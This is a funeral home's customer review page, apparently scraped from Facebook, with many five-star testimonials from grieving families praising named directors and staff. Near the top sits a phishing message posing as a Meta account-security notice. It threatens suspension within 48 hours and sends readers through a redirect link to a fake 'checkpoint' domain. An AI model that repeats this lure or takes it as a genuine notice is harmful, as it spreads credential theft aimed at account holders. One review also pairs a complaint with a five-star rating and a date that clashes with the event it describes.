Reviews

We receive many letters from the families we've served, thanking us for our caring ways during their time of loss. Their words warm our hearts, and speak to you of our professionalism, compassion, and the true value of the services we provide.

Dear Sytsema Funeral & Cremation Services, We have identified activities in your account that may constitute a breach of our Terms of Service concerning unauthorized access attempts. To prevent any disruption in your account usage, you are required to verify your identity. Please confirm your identity by clicking on the link below: ◉https://facebook.com/l.php?u=https%3A%2F%2Fcheckpoint-01652326594168.com If you do not complete the verification within 48 hours, your account will be temporarily suspended for security reasons. These precautions are taken to safeguard our users and their information. Thank you for your cooperation in maintaining the security of our community. Sincerely, Customer Support © 2024 META Network Inc.

5 stars
Joren Badiaon June 10, 2024

Robert (Bob) was our Funeral Director, Patient , professional and caring. I have to say, Form Bob to Tammy in the office, every staff member we spoke to made such a troubling experience the very best it could be! I mean, as quickly and broken as this started, they went above and beyond to help us get it all squared away! My Dad, Gary James Leeball, had the most beautiful service that anyone could ask for, and I mean that from the heart. You all are nothing short of amazing people! I know I speak for my entire family. Thank You, each and everyone one of you!

5 stars
GARY L March 08, 2024
5 stars
kylejackson8 January 12, 2024

Thank you for being so kind and supportive when we were struggling with our brothers unexpected death.

5 stars
Rochelle Van Dam December 11, 2023

Sytsema is the place to go to when burying a loved one, they treat your deceased loved ones like there own. They handled both my mom and dads funeral i was extremely satisfied with the service and they made my mom look really good. Jason and christy are very good at what they do and the whole staff is just a comforting presence. -Brandon elliott

5 stars
Annastasha Russell March 29, 2023

Our family has used there funeral home for many years. They are attentive to all of the family’s needs and do everything they can to help . I would recommend letting there family help yours.

5 stars
David Medendorp July 23, 2018
5 stars
Jim Miller August 30, 2016
5 stars
Todd VanZantwick June 21, 2018

Dean was very helpful through the entire process and was always available to answer my questions.

5 stars
siri slagboom September 27, 2020
5 stars
Sheryl V December 26, 2020

We were treated with care and compassion. Dean Meyering was aware of each family members needs and was attentive to each one of us. He was willing to work with us to provide the service our mother wanted. We appreciated the little details that were provided

5 stars
Kathy Hill March 26, 2021

Sytsema has cared for our family for years. My Husband and I have already pre-arranged and John was extremely helpful and caring. I highly recommend Sytsema as they go above and beyond for every client, every time.

5 stars
Diane Warner December 27, 2021

Very compassionate Care given to my family for years. We are humbled by the Director Dan, who was very professional and knowledgeable during very complicated arrangements that I had to do from out of town. God bless you all!

5 stars
Ruth E Manolis March 29, 2019

The ladies and gentlemen at Sytsema are very kind and courteous and they take care of the families after there loved one is gone. The ladies that came to get my father were very caring and gentle towards me and my father. And I loved that they have a flag cover for vets. Allie kept in contact with me the whole time, making sure every thing was done the way we wanted it and she was patient with all my questions. She also checked on me to see how I was doing. There team is absolutely wonderful.

5 stars
Dawn Dumas November 05, 2019

Arrangements easy to make online and follow up on phone. Very calming when taking to employees. Treated with respect.

5 stars
Deanna Bradford May 07, 2020

Allie was amazing, from the minute we picked up the phone. She took her time and explained everything and helped up out with everything we needed for the entire process. Our family's have always used Sytsema and now I know why!

5 stars
Candi H June 19, 2020

Scott and Todd Sytsema and everyone at Sytsema’s were wonderful to work with. They took care of everything and helped make my mother-in-law’s memorial service beautiful!

5 stars
Karen Fairfield August 18, 2020

The staff at Sytsema seem to be the best at what they do. I was a bit of a difficult client, orchestrating my dad's cremation from out of the country and three time zones away, but the staff took everything in stride and worked through the challenges with professionalism and compassion. I particularly appreciated the language the funeral director used when talking about my dad's remains. She said things like "Dad will be coming into our care" instead of something like "your dad's body will be coming to the facility," which I felt treated him and our relationship with such dignity and respect. These small details truly matter when going through grief, and I'm incredibly grateful to have chosen Sytsema to assist my family through this difficult time.

5 stars
Gail Gromaski October 05, 2020

My experience was very nice. The employees treated my family just like their own family. The warmth and prayers we received was a great experience. The staff was very helpful. My entire family was would like to thank Sytsema for all they did during our time of grievance.

5 stars
roger kitchen October 23, 2020

From the time my Mother passed Sytsema was there for me and my family. Scott walked me thru the process and made sure everything was carried out too my mothers wishes. Fantastic Family and very caring employees.

5 stars
Greg Schmeling November 30, 2020

The staff is so considerate and helpful. When going through a rough time like this the only choice for a funeral home is Sytsema Funeral Homes. They go above and beyond to help you with anything you need. I have trusted them with 2 of my family members and they have done a fabulous job with help me make all the arrangements needed and made sure that I was ok during it. In my personal opinion I would only trust this Funeral home. I have had other funeral homes take care of my other family and friends that have passed but the never were kind and thoughtful as Sytsema Funeral Homes. Big thanks to Scott Sytsema who helped me so much and just an awesome person.

5 stars
Courtnee Epstein February 04, 2021

We are very Thankful to Systems services for their complete understanding great help they gave us. Between the ease of use for their online service and phone calls all details were completed and we highly recommend them.

5 stars
Sandi Ryke March 19, 2021

Although nobody likes going through this experience the staff and particularly Allie Alacron with Sytsema made it so much easier. She was empathetic and very attentive. We couldn't have searched for a funeral director as involved and helpful as Allie. We are so grateful for her consideration. M Scott Lallo.

5 stars
scott lallo June 23, 2021

Sytsema assisted me with a family passing in the wee hours of the morning, when I had to make a fast decision...I am not sorry I chose them--they were professional, caring, and prompt.

5 stars
Sandra Mastaler August 04, 2021

My father passed away earlier this month. Prior to his transition he told me that he wanted to be cremated. I called Bob Vanderlaan at Sytsema and he walked me through the online process. It was fast and simple. I was able to pick everything I wanted for my dad online and submit payment as well. Durning our meeting Mr. Vanderlaan was very kind. The way he addressed my concerns were amazing. I appreciate how easy the process was at such a hard time in my life. I would definitely recommend this funeral home to any family ❤️

5 stars
Alberta Barnes September 23, 2021

I was so very happy with James! He was excellent! He made the transition of losing my mom “easy”. Very compassionate and always available to answer any questions we had. I just can’t express how excellent he was with my family!

5 stars
Kristi Cody November 03, 2021

The staff at Systems were at all times professional, respectful, and courteous. I wanted a very basic cremation and I never felt pressured to buy more services than what I wanted.

5 stars
Linda Palter April 14, 2022

Wonderful people. Todd Sytsema and Bob Vanderlaan cared for our family is if their own. Everything was perfect. Great value. Their fees were more then fair. Our family will always be greatful.

5 stars
Tom Vanderwall September 06, 2022
5 stars
Jay Wier December 19, 2013
5 stars
Evan Carlile January 23, 2014
5 stars
Cheryl Dobberstein May 06, 2014

Tom and I appreciate the professionalism at Sytsema Funeral Home. We recently completed our prearrangements at the Lee Chapel.

5 stars
Dollie Bacon-Hippchen December 20, 2014
5 stars
Kim Scott November 25, 2015

I absolutely love these guys. The entire family is involved, caring, and they take care of every step. I recently attended a funeral service at the Lee Chapel on Harvey in Muskegon. The place was beautiful, and one of the Sytsema sons greeted us at the door to be sure we were taken care of and that we knew where to go. He was so friendly, I thought he was part of the family at first and felt bad that I didn't recognize him. :-)

5 stars
Don Kalisz January 04, 2016

My family would like to express our deep appreciation to Jason and the Sytsema staff for the caring and attentive services they provided us.

5 stars
Dave-Mary Olson Wagner April 30, 2016
5 stars
Raelyn Geldaker June 17, 2016

I attended a memorial service on 10/29/16 at your chapel on Harvey. I was disturbed and disappointed that there were not enough chairs to seat the guests and nearly 50 people were forced to stand for the entire memorial. I asked an employee for more chairs and she told me "it is beyond my control." What terrible customer care! You owe this family a huge apology!

5 stars
Kim Marie Wood October 30, 2016
5 stars
Millie Baker December 24, 2016

The Sytsema family and team are truly amazing people caring and understanding in so many eats I have dealt with them 3 time for two of my sons as well as my husband I would definitely recommend my family and friends there for sure I have only dealt with the apple location and Todd Sytsema is the most caring and understanding person I have meet he has patients and understanding threw my struggle but he never gave up on me or let me down which I am beyond thankful for words could not even begin to explain how great of a person he is 5 stars

5 stars
Nicole Osborne March 08, 2017
5 stars
Fred A. Vandersys April 23, 2017

My husband passed away recently and we had to call upon System Funeral Home for advise and suggestions on how to plan a funeral. We were so impressed with how smoothly everything went starting from the visitation to the luncheon. We want to especially give a shout out to Bob Lake who was so professional and compassionate, he gave me so much confidence that Gary's funeral was going to be special.

5 stars
Sharon Merkins-McCormick September 11, 2017

We recently had to plan both our Mom and Dad's funeral less than 3 months apart. This should have been one if the most difficult parts of life (which it is) however, Jason helped to make the process as easy as it possibly could have been. Not one single detail was overlooked. He kept in contact with us during the process to keep us updated with anything that needed to be done. I hope to not plan any more funerals for a very long time, however, I know where we will go. I would never even consider anywhere else. Sytsema Funeral Home and Jason (and everyone else we came in contact with) were the epitome of professional, compassionate & sincere. Thank you so much!

5 stars
Nerita Czarny October 08, 2017
5 stars
Jodi Kendra Zuber-Smith January 06, 2018

I was thankful for the professional support and thoughtfulness of the staff while I led my family in saying goodbye to our beloved grandma. You are a wonderful bunch. Blessings.

5 stars
Jonathan Van Dop June 09, 2018

My mom passed away in November 2017- a year later my aunt ( her sister) passed away December 2018. My mom was cremated and my aunt pre paid for her funeral in Tennessee- where their mother was buried. The help and professional results I received was 5 stars ⭐️Todd kept me informed the whole time, as they arranged my aunt and my moms ashes to fly to Tennessee. Sytsema Funeral Home is outstanding- they show thoughtfulness and professionalism in all that they do. Thank you again Todd for your help in such a grieving time.

5 stars
Lori Kowalski January 11, 2019

Thank you for all your help with my step moms funeral. You all went above and beyond.

5 stars
Angie Rogers StCroix June 08, 2019

They have been very helpful to our family .

5 stars
Esther M Ellcey June 14, 2019

They did a very efficient job for us recently. Very pleased.

5 stars
Lyle Ogilvie March 25, 2020

Finalizing my husband's wishes had been done early, but Scott took the time to explain and answer questions my children and I had. I felt very at ease leaving my husband's final steps to them.

5 stars
Mary Van Hemert Pike June 23, 2021

My brother passed away in late October. Prior to his death he purchased a contract with Sytsema Funeral Home. I contacted Sytsema Funeral Home and spoke with Jen (very helpful) and was directed to Dean Meyering who assisted me with making arrangements. Dean was efficient, professional and extremely compassionate. He treated my siblings and myself, as if we were the only people he had to work with. The entire staff at Sytsema Funeral Home was so helpful and always just a call away. They are truly one in a million at a time, when it really matters. Our family appreciated the time given and every effort made by Dean and the staff to make sure all details were addressed. Thank you

5 stars
Linda Jarosch December 16, 2020
5 stars
Al Plantenga January 08, 2021
5 stars
Donna Robbins January 03, 2016

Beautiful, accommodating

5 stars
mischelle julien March 19, 2019

VERY UNDERSTANDING NICE FRIENDLY.

5 stars
Arnita Pevy April 08, 2019

My brother and father passed away within 10 months of each other. Both times, Sytsema funeral service provided the best customer service and care for a funeral one could ever ask for. Todd Sytsema did an outstanding job guiding me through the process for both my brother and fathers funeral. The entire staff was excellent to work with! I would definitely recommend Sytsema to anyone!!!

5 stars
Tony Gutierrez June 20, 2020

So helpful. Wonderful during these difficult times of our loved ones passing. Patient, kind, trusting, up front and caring. I definitely recommend Systema to help with all your creamation/funeral arrangements.

5 stars
Brie Fossler August 07, 2020

We could not have asked for better service, during the hardest time of our lives. Everyone we had contact with at Sytsema was very kind and caring. Chris was our funeral director, and from the moment we met him, he was nothing but understanding and compassionate. He led us through all the decisions we needed to make, without any pressure and let us take the time we needed to make those decisions. We will forever be grateful for their kindness and services during this most difficult time.

5 stars
Jamey Zeller August 26, 2020
4 stars
Erika Bell September 03, 2020

Scott Sytsema and the entire team at Sytsema Funeral home were wonderful to my family as we planned services for my Mom. We received personal and prompt attention. They took care of all the details we planned which allowed us to focus on our guests at the services. The peace of mind that the team brought to our family is second to none. We so appreciate everything they did to ease the stress of funeral services.

5 stars
Carol Moore September 25, 2020

First Class service from Sytsema. They made a very hard time bearable. Our funeral director, Chris Barnhill, reached out immediately and made sure we knew they were here for us. Appointments were set quickly, the initial visit (the toughest in my opinion) was handled with caring and grace. Chris made sure to explain every step of the process. What to expect next, who he would pay on our behalf so we didn't have to worry about it, helping to organize catering, flowers, memorial, burial etc. He had everything covered (and I mean everything!). Kudos to Chris and the entire team that works tirelessly (and nights and weekends) to make sure our loved ones move on properly. Thank you Sytsema!

5 stars
Stacey N. October 30, 2020

I would like to say that the Sytsema family and Eric was everything I could have wanted for my mom's home going you guys did a great job

5 stars
Willie Roberts November 08, 2020

I would like to thank Sytsema for their patience, professionalism, and their acts of kindness during our time of bereavement. A very special thanks to Eric Hathorn.

5 stars
Alberta Hunter November 10, 2020

OMG I LOVE YOUR ESTABLISHMENT AWESOME JOB AND CUSTOMER SERVICE THANK YOU SO MUCH FOR EVERYTHING YOU DID FOR MY FAMILY AND THANK YOU ERIC FOR ALL YOU DO

5 stars
pam phillips November 10, 2020

I would like to give Thanks Praises Glory unto the Father Son and Holy Ghost in the mist of this difficult time in the lost of our mother Donna R Williams. We would also like to Highly thank Sytsema furnearl home for an amazing job!! 🤗They did for us our mom and family. It was such a beautiful experience we had with them in this difficult time we had. Their employees was such a big help. Very nice , welcoming helpful patient. Even when we had a few changes at the last minute. The number One thing that HELPED was it was affordable and they have reasonable prices for everyone and also accommodating in everyone needs, race gender and budget. The Williams family thank and appreciate you all so much for taking good care of our mother and family in our difficult time you all made it easier for us and less stressful in being able to do everything in one setting. God bless you all and pray for you and your family and business to stay healthy strong and to keep growing 🤗 God bless have a blessed day

5 stars
Kristina Williams November 12, 2020

We had the most wonderful and beautiful Memorial Service at the Lee Chapel of Sytsema Funeral Services. Jeff Jakeway was there every step of the way and made our experience a pleasant one.

5 stars
Sherbear Sullivan November 21, 2020

I would like to thank Hannah Myers for her kindness, compassion, and expertise in handling the recent funeral of my father. Hanna made a difficult time much easier for our entire family. Sincerely, Tom Webb

5 stars
Jody Webb December 13, 2020

I never thought I’d be writing a review for funeral home, however I was very pleased with your service. Our family went through a tragic. The funeral home we chose to go to we were not pleased. We then decided to call Eric at Sytsema funeral home. He guided us in the way we needed to be. He helped us through the difficult time, most of All He made my cousin funeral possible. He was very professional and went over and beyond for our family I recommend anyone to use Their service.!!

5 stars
Lakedria Cooper December 17, 2020
5 stars
Yvette Stuckey December 21, 2020
4 stars
james coleman December 29, 2020

My family received EXCELLENT service and support from the Sytsema Funeral Team. We were blessed to have Eric Hathorn guide us with sincere caring, professionalism, and patience throughout planning the funeral service and cremation process for our loved one. Eric went above and beyond his role with ensuring that our entire family was completely satisfied. Based on the wonderful support we received at Sytsema, my family at a difficult time was able to accomplish and have a pleasant experience to make final arrangement decisions.

5 stars
Lauren Redd January 13, 2021

During the loss of my father, Sytsema welcomed me with open arms and treated me like family with dignity and quality care. Their professional services exceeded my expectations! They were very knowledgeable of the services they offered and were able to speak well as to how they could meet our desires regarding final arrangements. The staff was really hospitable and accommodating. They even extended their services through follow up calls after all was said and done. I highly recommend to work with one of the directors, Allie. She was amazing and was the driving force behind this experience😊 #Grateful Client

5 stars
Destiny Owens April 21, 2021

My grandmother looked beautiful! Everything was great! Your staff are so very incredible especially Eric Hathorn! I would love to bring other family members to work with you all! God bless you all!

5 stars
Tamika Johnson-Watts May 12, 2021

I had the most wonderful time at this chapel it was beautiful ❤️ thank you and God 🙏🙏 bless everybody

5 stars
Sheilla Nickel May 28, 2021

I am so thankful we chose Sytsema Funeral Homes to handle my husband's visitation and funeral. Every person we dealt with was compassionate, professional, and accommodating to our requests. All staff was available to answer questions, give advice, and work with us. The funeral directors with whom we worked couldn't have been more helpful during this difficult time.

5 stars
Sue Hamstra June 09, 2021

I would like to thank you all for making my family feel welcome and comfortable. We couldn’t have gotten thru this without the care and patience you all should to me and my family. We appreciated your Sympathy that was presented in our time of bereavement. When we entered the door We were greeted by Mr.Eric Hathorn and the Systema family it was very comforting, pleasant, very helpful and need I say very professional in making us feel we could trust in your great service in the future.Thank you Mr. Eric Hathorn and the Systema Family.

5 stars
angela evans August 20, 2021

I would just like to think the sytsema funeral home for all the kind words and being presentable during our time of grieving. I will also like to give a big thank you to Eric one of the funeral directors who handle and did a very good job with our love one i will recommend him to anybody thanks again for everything.

5 stars
Trishauna Drones August 22, 2021

Jason helped us plan my mothers wishes for when she passed. He was so thoughtful and understanding and really helped us through everything in a very difficult time. We could not ask for a better person or experience in a difficult time. He was there for at any time. Thank you Jason and the funeral home for everything in making my moms memorial the best. Kelly

5 stars
Kelly Somers December 30, 2021

Everyone that we encountered at the funeral home was very kind, helpful and understanding. The visitation and service all went as planned. Excellent care during a difficult time.

5 stars
December 30, 2020

Through the time of trial and tribulation in my journey ~ after the death of my husband ~ Jeff Jakeway, with the Sytsema Funeral Home Staff alongside, (Kevin, Jeff V., Jan, Kristy, and Keri), provided solace and consolation; their efficiency, patience and tenderness will be a memory held dearly. I have so much appreciation and am humbled by Jeff Jakeway's care and concern in helping me move forward throughout; his gentleness and assurance while accompanying me at the crematorium brought peace to a wounded heart and joy to a spirit, freed. His diligence never faltered, brightening each day we met or spoke via phone. Once again, my extreme gratitude for your perseverance in working with me, Jeff, as well as a job well done.

5 stars
Judy Gray June 14, 2019

The amazing staff have compassion that comes from the heart, which is very comforting to the family.

5 stars
Susan Grams May 22, 2019

Sytsema Funeral Home is outstanding! The service they provided for my brother 10 months ago was excellent. They knocked it out of the park with my father two years ago! Working with Todd Sytsema was a great experience.

5 stars
Anthony Gutierrez May 01, 2019

Our family thought we were treated with compassion, dignity and very professionally. We were very satisfied with the service provided by Sytsema Funeral Home.

5 stars
Dennis Fodrocy March 06, 2019

I can't say enough about Sytsema Funeral Home- especially Jason! He helped with my mother's concerns and went above and beyond answering her difficult questions. My father's visitation, funeral and burial at Fort Custer will always be remembered.

5 stars
Deborah Roest August 27, 2018

I would like to say "Thank you" to Dean for making a very difficult time in my life very manageable. His compassion, care and concern for my well-being as well as all the funeral details was absolutely phenomenal!

5 stars
Carol Bauer July 20, 2018

On behalf of my dad, James H. Lawie, and our entire family, we are so appreciative of all that was done from the pre-arrangement to the transfer, arrangements, service, etc. They went above and beyond.

5 stars
Joan Hall June 04, 2018

I was treated with respect and more importantly like family. Chris was so attentive to our needs and answered all of our questions through this difficult time. He left no stone unturned. Fantastic!

5 stars
Jeanne Grelewicz May 15, 2018

Everything was excellent and exceeded my expectations. Please know your kindness and professionalism helped tremendously during a difficult time. Thank you for all you did.

5 stars
Monique Van Epps May 02, 2018

Amazing Team!

5 stars
AH February 09, 2018

Words cannot express our gratitude to Sytsema Funeral Services for their expertise, professionalism, support and caring during our darkest hour. Mr. Scott Vanderlaan and all the staff were there to help us through this difficult process. Their genuine caring shined thru every step of the way. For that, we will be forever grateful.

5 stars
Mark and Peggy Sue Hicks October 20, 2017

I am so happy with Sytsema. My husband's death was not expected; Bob and Sytsema's were so helpful. I would recommend to anyone.

5 stars
Bobbi Crampton September 07, 2017

Our family was very impressed with the quality of services offered and provided by Sytsema Funeral Home - Lee Chapel.

5 stars
JM September 07, 2017

We've used Sytsema twice in the last 6 months. They were really kind and made sure everything we wanted/needed was done. Very upsetting times were made easier for us because of them.

5 stars
CK February 14, 2017

The people we dealt with at Sytsema Lee Chapel were amazing-felt like family- did a wonderful job and made us all feel "taken care of". We are very grateful for their help.

5 stars
Karen Donovan February 06, 2017

I only have compliments and an abundance of gratitude for how I was treated- Thank you, you were a blessing then, and always.

5 stars
Susan Harrison-Wolffis February 06, 2017

Everyone connected with my husband's visitation and memorial service went above and beyond to make sure he was remembered with dignity and honor.

5 stars
JG November 01, 2016

During such an emotional time John and the rest of the staff were so caring- They made sure EVERYTHING was done as to our wishes!!

5 stars
SK October 07, 2016

Sytsema was perfect in every way and ways I hadn't imagined. Every encounter with every person was meaningful and pleasurable.

5 stars
LS August 04, 2016

I would highly recommend them to everyone.

5 stars
RS May 24, 2016

The Walburn Chapel has taken care of my grandparents and parents. Those at Walburn who have taken care of us have always felt more like family than business people.

5 stars
MC May 10, 2016

Jason, the funeral director working with our family was compassionate and caring in working with us, met our needs and wanted to make sure our questions were answered.

5 stars
KS November 12, 2015

We had the visitation in our church prior to the service. They had everything (flowers, picture boards) arranged very nice. Our pastor said they were great to work with.

5 stars
BH November 11, 2015

Very appreciative of Bob letting me know when things needed to be done and the quiet manner he did them in. Office ladies always helpful if I had any questions or paperwork needs.

5 stars
NW September 09, 2015

I was very impressed with my mom's service. Couldn't have found a better place for my family to have arrangements through Sytsema- Lee Chapel!

5 stars
JJP August 20, 2015

"Thank you so much for helping us through my fathers passing. We couldn't have done it without you. The graveside service was a complete success."

5 stars
D.G. July 28, 2015

Our family was very pleased with the help of the staff - supportive and professional.

5 stars
BK June 24, 2015

They were on top of everything!

5 stars
Delores Bowne June 18, 2015

Our family cannot begin to thank Cameron for his compassion during the most difficult time of our lives.

5 stars
Kelly Merz June 11, 2015

Very happy with the way everthing was handled. Kelly handled the pre-arrangements and I was impressed and happy with how she handled all of it. Cameron was excellent.

5 stars
BW May 06, 2015

Mother would have been very pleased and proud of her family.

5 stars
JS April 28, 2015

I had to arrange this funeral from Kentucky. Cameron was very helpful. He stayed in touch and provided me information. Very professional.

5 stars
BA April 27, 2015

Sytsema Funeral Home does the best in this area. They are excellent. Everything was perfect and they always are dressed so neat. I recommend them highly. All the employees are great!

5 stars
Lottie Stuparits March 23, 2015

Jason was wonderful when my father passed away. He was always available for any questions that we had for him (and we had quite a few.) He treated all of us with the utmost of respect and was very caring and understanding. Jason handled all of the details, and there were so many, with precision and professionalism. The whole staff at Sytsema were wonderful. They made a very difficult time easier. Thank you Sytsemas!!

5 stars
Kristi Kozal March 09, 2015

The overall experience was great. The service was invaluable.

5 stars
CS January 29, 2015

It was, in my opinion, first class.

5 stars
PF January 29, 2015

John and his staff were wonderful. They answered every question we had and treated us with dignity and respect. They knew just what to do to make this sad time easier. You can be very proud of this business and how caring they are.

5 stars
Charlotte Johnson January 27, 2015

Everything was beautiful! Thank you to everyone!

5 stars
DB January 08, 2015

Perfect! Enough Said.

5 stars
PC October 30, 2014

Sytsema Funeral assisted our family with the arrangements of the Funeral and Beautiful Celebration of Life for our father Eugene Polak. Brian Sipes and the Sytsema team were Very Kind and Compassionate helping us maneuver through this difficult time. We felt they listened to our wishes and were available whenever we had any questions. We are Grateful for their service and how they made this about our family and didn't make this process feel like business transaction.

5 stars
C Davis May 11, 2024

Sytsema has serviced my family for over 60 years, they have always been professional and compassionate in doing so. It was a easy decision to recently have them be a part of my Dad's after life care.

5 stars
Dan Smith January 19, 2024

We were very appreciative of the professionalism and support we received from Sytsema. As a part of the African American community, I assumed that the obvious choice would be an African American funeral home. In my personal experience, the treatment was very different. At a time of loss and grief a family deserves; professionalism, empathy, patience and definitely INTEGRITY. We found all these qualities in Sytsema. Thank you

5 stars
larita harris January 11, 2024

The staff at Sytsema was so caring and helpful, they made our family feel so at ease at.Our time of grief. It has been 2 1/2 years since the passing of my Son and I called them for help with something and they went out of their way to help. God bless you

5 stars
Anita Sneed April 14, 2023
5 stars
Arlona Schulz March 03, 2016
4 stars
Connie Burchfield August 10, 2019
5 stars
Denny VanHall October 29, 2016

I need to share how wonderful working with Dean and the VanZantwick Memorial Chapel has been. Losing a family member is so very difficult. Coping and also having to learn things you just don’t want to know makes it so much more difficult. I called and Dean helped me though this difficult process. Everything was taken care of by Dean. I only had to make choices. Choices to honor my father (Edmundo Gutierrez) was the easiest part of this process. Dean and VanZantwicks made the celebration of my fathers life just that. It was a celebration to honor. Dean helped us do so in the best way possible. I really can’t say enough good things. I didn’t leave that day with a smile on my face but when I think back I do smile. We all left with warm hearts knowing celebrated his life and mourned his death at the same time. I thank you Dean and VanZantwicks for your guidance and hard work. We will always be thankful for all you have done. Donna Gutierrez Viveen

5 stars
Donna Viveen August 16, 2019

Craig Sytsema expertly handled the final arrangements for our loved one. It was a difficult time for us, but he made it as easy as possible and guided us through every step. His knowledge, support and professionalism were beyond expectation and greatly appreciated.

5 stars
Tami Ripple November 17, 2020

Many thanks for everything Dean and Craig did for our father. We appreciated the professional send off you gave him. You organized his military send off to perfection. It made his passing so much easier to deal with. We have no hesitation in recommending Sytsema Funeral Home to others . Kind Regards Jerry and Sandy

5 stars
Jerome Swifney January 07, 2021

Dean was very helpful and listened to our needs. He worked within our short timeframe and was very understanding. The Sytsema team made a difficult process seamless.

5 stars
Sally Moser April 17, 2021
5 stars
Linda Hubbard February 06, 2016

An unexpected sudden death of a family member occurred. I am not from Michigan and traveled to take care of the estate. Scott was more than helpful and made the process smooth and easy. He was kind and very professional and I am grateful for his help.

5 stars
Lovey Howe July 04, 2019

My family lives in Portland, Oregon and my mom, who died suddenly and unexpectedly, lives in Muskegon, MI. I have, unfortunately, had to bury my two grandparents over the past decade as well, so I am familiar with the process and business of burying family members. Sytsema on Apple Avenue was THE best funeral organizing experience I could have ever asked for. Todd Sytsma was thoughtful, prepared, patient and incredibly kind. We had my mother's home going celebration within 5 days of her death, and it was purely due to Todd. My mother looked like herself, a bold African American matriarch. Every family member commented on how well she looked, how organized and professional the wake and the funeral were, and how beautiful all of the arrangements were. Todd and the Sytsema enterprise were a God send for me. And I would recommend them to ANY one.

5 stars
Serilda Summers-McGee February 15, 2020

As a Funeral Director, it is important to have a network of colleagues across the nation to help our client families who lose a loved one that has moved away or passed while traveling. I know that if I ever need to help someone in the greater Muskegon area, that I can count on the Sytsema's to assist with professionalism, care and excellence. They are the firm that I trust most to help in Michigan.

5 stars
Matthew Fiorillo May 27, 2020
5 stars
Shaunteka Jones August 07, 2020

My family and I could not have had a more personable or professional experience than Sytsema provided. As difficult a time as it was we will be forever grateful for their consideration throughout this time of grief.

5 stars
Cherielynn Kelley October 02, 2020

We were so happy we made the choice to use Sytsema. Walked with us through every step in a very trying time. Thank you!

5 stars
Scott Feltner October 12, 2020

Eric made our experience so much easier and helpful , this was a very difficult time for me and my Family and the Sytsema Family was very helpful and kind with everything, it was not about the money with them. They truly care about your loved one and your family, Thank you for everything you have done for us... Eric also called to follow up just to see how we are doing I really was touched ....

5 stars
Anita Sneed October 23, 2020

This was a great experience I’m truly happy for my mother Joanne Williams choosing Sytsema for her affairs Thank you again everyone the staff at Sytsema... Avery Williams

5 stars
Ave January 30, 2021

They were extremely helpful and easy to work with during a very, very difficult time. Everyone in the office was pleasant and very understanding. I would definitely recommend them.

5 stars
Char Silkworth March 16, 2021

We needed to keep expenses at a minimum and after "shopping" around, discovered that Sytsema's had the perfect plan at a very affordable cost. The staff exceeded our expectations and we highly recommend their services. Will use Sytsema's again in the future, should the Lord teary.

5 stars
Jerry Lee April 20, 2021
5 stars
Kimberly Hoskin July 25, 2021

I highly recommend Sytsema as they were very helpful and kind to us during the recent loss of a loved one. Excellent in every way. Thank you!

5 stars
Ed Kinney August 20, 2021

I am 26 years old and I did not have any idea what I needed to do to fulfill my fathers wishes to be cremated. I reached out to Sytsema and got connected with Bob Vanderlaan. He directed me to complete the online process. It was so simple to get done. I was able to choose everything for my father online and submit payment. When I met with Bob he was able to answer all my questions. He was very kind and considerate. I would recommend Systema to any family.

5 stars
Kanisha Davis September 24, 2021

Very nice and professional associate the chapel very clean warm feeling and they greeted you with the very warm smiles

5 stars
Bonnie Sue Warren April 12, 2022

Sytsema Funeral and Cremation Services in Grand Haven helped me when I needed a simple cremation for my brother with a viewing. They were very efficient and kind and gave me comfort at a difficult time.

5 stars
Em in GH MI May 09, 2022
5 stars
Patricia Flickema December 05, 2013
5 stars
Nancy Ferencsik Swain January 02, 2014
5 stars
Barbara VanAndel Smith January 29, 2014
5 stars
Jessi Schleh June 27, 2014

Cameron and staff were wonderful after the passing of my father-in-law.

5 stars
Lisa Tratnik Smith April 29, 2015

Our family appreciated the kind, caring, & professional way the whole Systema staff treated us in our time of sorrow! The Harvey Lee Chapel is absolutely gorgeous & was most fitting for my beautiful Mom! Thank you all for your kindness & support!

5 stars
Alicia Rogers November 27, 2015
5 stars
Susan Marie Vredeveld January 25, 2016

I had (2) family members pass unexpectedly within (5) days. Jason was wonderful when my sister passed. He handled everything with such kindness and compassion, treating us with such respect; making it comfortable to approach him with anything. He has been such a blessing. On the day of my sisters service my father-in-law unexpectedly passed away; because of my experience with Jason, I recommended him to the family and requested that Jason assist with the planning and preparations. He was able to make the necessary arrangements to provide us with exceptional care once again. Along with Jason, Ken, and Ginger - the entire Sytsema Staff has been remarkable; providing both sides of my family with wonderful care. In times of grief, it is nice to be able to rely on such a sincere group of individuals.

5 stars
Michelle VanHemert June 07, 2016
5 stars
Henry C. Duquette July 26, 2016

Amazing staff. Beautiful locations to celebrate your loved ones life.

5 stars
David Matuzeski December 16, 2016

It is truly remarkable the care and professionalism they provide .

5 stars
Collin Veihl January 06, 2017

I cannot express my gratitude enough to John and Scott Systema. Unfortunately we had to call upon their services recently and were overwhelmed with the decisions we had to make. John was patience and walked us through it very carefully. Scott was also very helpful during and after the service directing us through this very trying time. Words are not adequate enough to express my appreciation to the Sytsema family! They are very professional, but above all, they treat you like family.

5 stars
Chris Amaya Gilchrist March 19, 2017

5 stars

5 stars
Karrie Munster May 16, 2017

I would like to thank Hanna and the Sytesma family for the professional caring services and comfort they provided during this difficult time for our family. They walked us through every step and guided and helped us through this process. No words can express the gratitude for the services provided. We were treated like we were family.

5 stars
Paul Tiefenthal September 11, 2017
5 stars
Suzi Dreese Hemmeke October 31, 2017

After losing my first husband (Richard Ward) in 1990, I used the services of Sytsema Funeral Home on Apple Ave and was impressed with the care and compassion my family was shown. Sadly, in April of 2017 my second husband (Richard Bobian) passed away. I again called on Sytsema Funeral Home for their service. This time we used the Lee Chapel and everything was taken care of with cremation, meeting with family, visitation, funeral, luncheon, and burial. I'm sorry it has taken me so long to write this review, but I wasn't aware of the availability to review on Facebook. Thank you very much for all the caring and compassion your staff has shown our family and friends. Sharon (Ward) Bobian

5 stars
Sharon Folk Ward Bobian February 25, 2018

Great people and very caring.

5 stars
William D. Adams August 19, 2018

I just want to compliment Hannah Myers. During the past week she has been amazing. She was sweet and kind and caring and did everything with a smile. My mom would be so pleased at how everything turned out! You have a true calling, Hannah! Thank you, Tami Strodtbeck (Sharon Bobian's daughter)

5 stars
Tami Ward Caughey Strodtbeck March 18, 2019

Top notch! They always go above and beyond! Very friendly and professional. The Best!

5 stars
Kristi Kettler June 10, 2019

